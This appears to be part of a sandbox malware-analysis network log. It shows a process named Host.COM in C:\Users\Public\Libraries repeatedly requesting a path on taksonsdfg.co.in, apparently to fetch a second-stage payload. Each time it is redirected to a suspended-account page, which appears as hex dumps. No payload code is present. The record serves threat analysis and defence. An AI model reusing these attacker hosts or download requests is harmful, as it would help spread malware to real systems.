                                                                  2024-11-26 08:38:20 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:38:20 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:38:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.749730108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:22 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:22 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:38:22 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:22 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.749737108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:24 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:24 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:38:24 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:24 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:38:24 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:38:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.749746108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:26 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:27 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:38:27 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:27 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.749752108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:28 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:29 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:38:29 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:29 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:38:29 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:38:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.749759108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:31 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:31 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:38:31 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:31 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.749765108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:33 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:33 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:38:33 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:33 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:38:33 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:38:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.749772108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:35 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:35 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:38:35 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:35 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.749776108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:37 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:37 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:38:37 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:37 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:38:37 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:38:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.749783108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:39 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:40 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:38:39 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
